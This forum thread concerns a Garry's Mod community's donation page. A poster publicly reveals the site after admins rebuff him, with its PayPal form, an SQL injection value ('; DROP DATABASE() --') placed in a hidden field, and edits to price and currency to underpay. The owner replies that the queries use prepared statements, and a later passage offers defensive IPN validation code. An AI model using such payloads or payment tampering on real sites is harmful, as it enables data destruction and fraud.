Well long story short, I found an exploit on -ICE-'s community website allowing people to perform SQL injections. I found this out simply by roaming on -ICE-'s website after being hired to fix a few errors on his DayZ (Garry's Mod gamemode made by Pheonix) server. Problem being when I contacted both the Owner and an Administrator on his Steam Community page, they are unwilling to help themselves. Thought I would share what put a smile on my face for trying to help people.
[code]
|-ICE-|✞Vin✞: what do you need?
Alex: That's a kind and totally not agressive way of starting a conversation with someone that can help you.
|-ICE-|✞Vin✞: Look man I have to keep lay low from unknown people
|-ICE-|✞Vin✞: What do you mean you can help me with something?
Alex: I worked with -ICE- on attempting to fix the DayZ server from the loot spawning problem. True I didn't end up fixing the problem that happened to fix it's self upon reinstallation, but that is not the point I wish to make.
Alex: There is an exploit on your servers that allows people (such as myself) to wipe your mysql databse. I would like to help you fix the problem.
|-ICE-|✞Vin✞: you're suspicious
|-ICE-|✞Vin✞: why do you look into this stuff
Alex: Would you like me to demonstrate?
|-ICE-|✞Vin✞: hold on a second
|-ICE-|✞Vin✞ is currently offline, they will receive your message the next time they log in.
|-ICE-|✞Vin✞ is now Online.
Alex: Shall we start this conversation again, this time not forgetting about social niceties?
|-ICE-|✞Vin✞: No, I don't trust people like this.
|-ICE-|✞Vin✞: Much less french internet terrorist
|-ICE-|✞Vin✞: if you want to wipe our damn database
Alex: I don't want to. This is why I am helping you prevent it from happening
|-ICE-|✞Vin✞: I know you are trying to scam us
Alex: Now perhaps you would like me to simply explain how someone might be capable of doing this?
|-ICE-|✞Vin✞: and I cant do anything about it myself
Alex: I ask for nothing in return, I am simply here to give you information, nothing more
|-ICE-|✞Vin✞: I don't why you contacted me personally
|-ICE-|✞Vin✞: Im sure you are.
Alex: I contacted you because you were online, and one of the admins on the -ICE- steam group
Alex: fine then. Don't say I didn't to help you.
Alex: I can give you a third chance to listen to what I have to say instead of being paranoid, but I doubt you will take me up on the opportunity.
Alex: I have tried contacting -ICE- about it himself after working with him on the DayZ loot files. He has failed to respond to me
Alex: So final time. Would you like to simple listen to how someone is able to perform such an attack? I am not asking for anything in return, you do not need to use this information if you don't want to. And on top of that I can give you credentials so you might be able to trust me for the few minutes I take out of my time to help you.
Alex: I will be contacting the player 'Yoobs'. You may warn him of what I have to say if you so wish.
[/code]
Alex: There is an exploit on your servers that allows people (such as myself) to wipe your mysql databse. [B][I][U]I would like to help you fix the problem.[/U][/I][/B]
|-ICE-|✞Vin✞: you're suspicious
|-ICE-|✞Vin✞: why do you look into this stuff
People like him make me want to support occult magic and satanism. I cannot understand how dumb someone can be in such a moment.
if i was in your place now, i'd just wipe the database by now since people like this piss me off very much
[QUOTE=Knoxed;46811162]if i was in your place now, i'd just wipe the database by now since people like this piss me off very much[/QUOTE]
Just for the fact he called me a 'french internet terrorist'. Never been called that before :v:
In all seriousness though I am going to give them a chance to fix it, and if they don't, release the exploit on their website, let them deal with the consequences.
Release it here instead
I've noticed a lot of server owners can get pretty aggressive with you if you try to suggest stuff, it makes me quite sad
most community owners are 5 year olds, dont bother helping them
[editline]28th December 2014[/editline]
is their community tag the same as their owners name? or does he just make his admins wear his name in their names...
Actually getting somewhere with helping them. But not before another episode of paranoia from another Admin:
[code]
Yoobs: Ok
Yoobs: Ive contacted him
Alex: Have you given him the link?
Yoobs: no
Yoobs: i didnt evne look
Yoobs: it was telling me to register to view the link
Alex: Well here's the gist of it
Yoobs: and why do i want to know whats you
Alex: http://puu.sh/dMPAl/b69e808b46.txt
Yoobs: Really
Yoobs: A link that tries to ban you
Yoobs: Nice one
Alex: Erm, no?
Yoobs: Step ahead there buddy
Alex: It's a link to a chat log xD
Yoobs: Just copy and paste
Yoobs: it
[/code]
[code]Yoobs: A link that tries to ban you[/code]
is he serious
[QUOTE=imacc2009;46811466][code]Yoobs: A link that tries to ban you[/code]
is he serious[/QUOTE]
probably due to hackers using puush
I wish people like you would come to my server instead of these groups of friends who think they're master trolls.
Well since the owner doesn't want to spend 2 minutes fixing it, here's the exploit.
[url=http://icedarkrp1.site.nfoservers.com/donate/index.php?page=checkout&game=gmod&server=darkrp&pid=4]This here[/url] is the donation system for their server. I have already selected a simple $1 item, but the price is irrelevant, as you will soon see, we can get any item for any amount. But that's not why we are here, we don't want to just abuse the system, we want to exploit the system.
So what now? Well as you can see, you can put in your SteamID. This is where the Owner had a tiny bit of sense and verifies the user's steamID. In fact it validates the steamID format, and then generates the 64bit version of it. This would normally mean we couldn't perform any SQL injections from simply putting in an un-escaped character. Once this is done it generates the paypal button, giving paypal all the information it needs to give back to the IPN.
[code]
<form action='https://www.paypal.com/cgi-bin/webscr' method='post' name='frmPayPal1'>
<input type='hidden' name='business' value='connorcoulson@yahoo.com'>
<input type='hidden' name='cmd' value='_xclick'>
<input type='hidden' name='item_name' value='DarkRP1 Donation - RecordWipe'>
<input type='hidden' name='item_number' value='4'>
<input type='hidden' name='amount' value='1'>
<input type='hidden' name='no_shipping' value='1'>
<input type='hidden' name='currency_code' value='USD'>
<input type='hidden' name='handling' value='0'>
<input type='hidden' name='custom' value='76561197960265728'>
<input type='hidden' name='cancel_return' value='http://icedarkrp1.site.nfoservers.com/donate/'>
<input type='hidden' name='return' value='http://icedarkrp1.site.nfoservers.com/donate/success.php'>
<input type='hidden' name='notify_url' value='http://icedarkrp1.site.nfoservers.com/donate/ipn.php'>
<input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_xpressCheckout.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
</form>
[/code]
As long as we keep the IPN callback url the same, we can do whatever we want with the other values. This includes spending only $0.01 for any item (which actually ends up costing the server more than they receive, fun exploit in itself). Anyway.
[code]
<input type='hidden' name='custom' value='76561197960265728'>
[/code]
This is what we are interested in. The donation system has already checked and validated the steamID, and generated its own values. So naturally they think once the user input is finished, everything is dandy.
[code]
<input type='hidden' name='custom' value='`; DROP DATABASE() --'>
[/code]
Or something along those lines is pretty much what you would need to do to drop the database. As well as this, most donation systems will store records of transactions. This means we can probably do the same for the following fields
[code]
<input type='hidden' name='currency_code' value='USD'>
<input type='hidden' name='amount' value='1'>
[/code]
Or if we didn't want to spend $1 performing this exploit:
[code]
<input type='hidden' name='currency_code' value='JPY'>
<input type='hidden' name='amount' value='1'>
[/code]
Anyway. I hope I don't get banned for this, I have tried helping them out being a White Hat, now it's time to wear the Gray Hat.
Hey look my server XD but please annoy the stupidity of my Superadmins.. Thanks Ding for bringing this up to me, I've been super busy lately with Christmas and New Year's Eve stuff but I'm definitely interested in getting this fixed :P
Honestly those 'donation' packages deserve a database wipe.
[QUOTE=imacc2009;46811466][code]Yoobs: A link that tries to ban you[/code]
is he serious[/QUOTE]
Yeah I'm serious, people send you a link to a website that sends a small UDP packet to rcon and if you get the password wrong for rcon 3 times it bans you and the only way of unbanning someone is if you unban them through the server files.
[QUOTE=yoobs;46824056]Yeah I'm serious, people send you a link to a website that sends a small UDP packet to rcon and if you get the password wrong for rcon 3 times it bans you and the only way of unbanning someone is if you unban them through the server files.[/QUOTE]
How about you do something about it instead of fearing links? It's an easy fix.
[QUOTE=-ICE-;46823780]Hey look my server XD but please annoy the stupidity of my Superadmins.. Thanks Ding for bringing this up to me, I've been super busy lately with Christmas and New Year's Eve stuff but I'm definitely interested in getting this fixed :P[/QUOTE]
One can't just "annoy" the stupidity of the "Superadmins"
I'm going to assume you meant ignore.
However, they do display the quality of your server.
You may want to whip them in shape.
Nice, this is why paranoia gets you nowhere.
Also, it looks like all this could delete is the MySQL Database that the donation system is linked with. It's still insecure, but unless he has the donation system and the server files on the database it's not a major issue save for the fact that all temporary benefits will become permanent.
-snip-
[QUOTE=dingusnin;46823675]Well since the owner doesn't want to spend 2 minutes fixing it, here's the exploit.
[url=http://icedarkrp1.site.nfoservers.com/donate/index.php?page=checkout&game=gmod&server=darkrp&pid=4]This here[/url] is the donation system for their server. I have already selected a simple $1 item, but the price is irrelevant, as you will soon see, we can get any item for any amount. But that's not why we are here, we don't want to just abuse the system, we want to exploit the system.
So what now? Well as you can see, you can put in your SteamID. This is where the Owner had a tiny bit of sense and verifies the user's steamID. In fact it validates the steamID format, and then generates the 64bit version of it. This would normally mean we couldn't perform any SQL injections from simply putting in an un-escaped character. Once this is done it generates the paypal button, giving paypal all the information it needs to give back to the IPN.
...
Anyway. I hope I don't get banned for this, I have tried helping them out being a White Hat, now it's time to wear the Gray Hat.[/QUOTE]
Yet you haven't tested the exploit nor do you know the background process, and you think you are a leet hacker...
[IMG]http://i.imgur.com/77NqUjF.png[/IMG]
[IMG]http://i.imgur.com/FLkfu8h.png[/IMG]
[b]In addition all mysql queries use prepared statements.[/b]
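For anyone maintaining a donation script like the one discussed in this thread: every field PayPal echoes back to the notify_url originated in a form the buyer could edit, so the handler has to re-check each one. The sketch below is an added example, not code from this thread or from the donation system; it assumes the IPN message has already been verified with PayPal, the catalogue, receiver address, table layout and function names are hypothetical, and sqlite3 stands in for MySQL.

```python
import re
import sqlite3

# Hypothetical server-side catalogue: item_number -> (price in cents, currency).
CATALOGUE = {"4": (100, "USD")}
RECEIVER = "donations@example.invalid"      # placeholder merchant address
STEAMID64 = re.compile(r"7656119\d{10}")    # assumed format check for SteamID64
AMOUNT = re.compile(r"(\d+)(?:\.(\d{1,2}))?")

def open_db():
    db = sqlite3.connect(":memory:")        # sqlite3 stands in for MySQL
    db.execute("CREATE TABLE donations (txn_id TEXT PRIMARY KEY,"
               " steamid64 TEXT, item TEXT, cents INTEGER)")
    return db

def sample_ipn(**overrides):
    """Constructed IPN fields for item 4; overrides simulate an edited form."""
    ipn = {"payment_status": "Completed", "receiver_email": RECEIVER,
           "txn_id": "TXN-CONSTRUCTED-1", "item_number": "4",
           "mc_gross": "1.00", "mc_currency": "USD",
           "custom": "76561197960265728"}
    ipn.update(overrides)
    return ipn

def handle_ipn(db, ipn):
    """Return 'ok' or the reason an already PayPal-verified IPN is rejected."""
    if ipn.get("payment_status") != "Completed":
        return "not completed"
    if ipn.get("receiver_email", "").lower() != RECEIVER:
        return "wrong receiver"
    item = CATALOGUE.get(ipn.get("item_number"))
    if item is None:
        return "unknown item"
    cents, currency = item                  # price comes from the server, never the form
    if ipn.get("mc_currency") != currency:
        return "wrong currency"
    m = AMOUNT.fullmatch(ipn.get("mc_gross", ""))
    if not m or int(m[1]) * 100 + int((m[2] or "").ljust(2, "0")) != cents:
        return "wrong amount"
    steamid, txn = ipn.get("custom", ""), ipn.get("txn_id")
    if not STEAMID64.fullmatch(steamid) or not txn:
        return "bad custom or txn_id"
    try:
        with db:                            # placeholders keep values out of the SQL text
            db.execute("INSERT INTO donations VALUES (?, ?, ?, ?)",
                       (txn, steamid, ipn["item_number"], cents))
    except sqlite3.IntegrityError:
        return "duplicate txn"              # replayed notification
    return "ok"
```

The price and currency are looked up by item_number on the server, so a notification for an edited amount or currency is rejected before anything is written.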
[code]
Alex: I worked with -ICE- on attempting to fix the DayZ server from the loot spawning problem. True I didn't end up fixing the problem that happened to fix it's self upon reinstallation, but that is not the point I wish to make.
[/code]
Nice to know. I guess the installation instructions weren't followed correctly again.
[QUOTE=Phoenixf129;46826335]
Nice to know. I guess the installation instructions weren't followed correctly again.[/QUOTE]
Dragging and dropping is too hard.
[QUOTE=Phoenixf129;46826335][code]
Alex: I worked with -ICE- on attempting to fix the DayZ server from the loot spawning problem. True I didn't end up fixing the problem that happened to fix it's self upon reinstallation, but that is not the point I wish to make.
[/code]
Nice to know. I guess the installation instructions weren't followed correctly again.[/QUOTE]
Hey I finally did fix it XD
Although this person went way too far and should have at least listened to what you had to say, he more than likely only said that stuff in fear. I am not condoning what this person did but you have to look from both sides of the situation. If a server owner is just starting out and he doesn't know a lick of coding he is going to be cautious. He doesn't want someone coming onto his server pretending to be his friend and just hijacking his server. Especially with how the gmod community is right now with players ddosing servers, putting backdoors in addons, and leaking content. He'd be crazy not to be a little skeptical about it.
In hindsight this dude should have chilled out. I know if someone told me I had an exploit I wouldn't just sit there ignoring what they said.
Looks to me like they had a right to be suspicious of you.
Why didn't you just tell them what the problem is from the start, instead of dancing around acting like some hero who's going to save their servers?
That conversation read more like a thinly veiled threat than a genuine attempt at helping someone.
Why then would you post it publicly to spite them?
Can't believe people support this shit.
[QUOTE=kila58;46824145]How about you do something about it instead of fearing links? It's an easy fix.[/QUOTE]
And this fix is?
[QUOTE=Blasteh;46827938]Looks to me like they had a right to be suspicious of you.
Why didn't you just tell them what the problem is from the start, instead of dancing around acting like some hero who's going to save their servers?
That conversation read more like a thinly veiled threat than a genuine attempt at helping someone.
Why then would you post it publicly to spite them?
Can't believe people support this shit.[/QUOTE]
he called him a french internet terrorist and a scammer before he could even start
[editline]31st December 2014[/editline]
[QUOTE=yoobs;46828138]And this fix is?[/QUOTE]
disabling rcon and or disabling penalties?
did you even stop to think about it
LOL
please stop running a community
I'm the server owner actually, not Vin Diesel. So please don't get him confused. It's Christmas break and I'm out enjoying my time with my friends and having a real life, Alex did contact me about this but understand I get a 1000 messages a day and the only contact I really have are people who are on my Teamspeak. Now please stop being mean :P
[QUOTE=-ICE-;46839902]I'm the server owner actually, not Vin Diesel. So please don't get him confused. It's Christmas break and I'm out enjoying my time with my friends and having a real life, Alex did contact me about this but understand I get a 1000 messages a day and the only contact I really have are people who are on my Teamspeak. Now please stop being mean :P[/QUOTE]
Please stop being "mean" to you when you obviously can't take the 5 seconds out of your day to say "What's up? I'm busy, send me the messages and I'll get back to you later." and/or have an admin team competent enough to not only listen to people that want to help, but also bring the problem up with you if they're unsure of what to do. It seems like you just have a ton of retards running rampant in your servers that need your help on what to do whenever anything happens, this is not the way to run a community seeing as if you have everyone running to you for help, when you're not around to help the servers suffer severe hits. Myself and my friends rage cheated + exploited your DarkRP server for literally hours on end for weeks and nothing happened besides bans, the exploits weren't fixed until Deagler fixed them for you.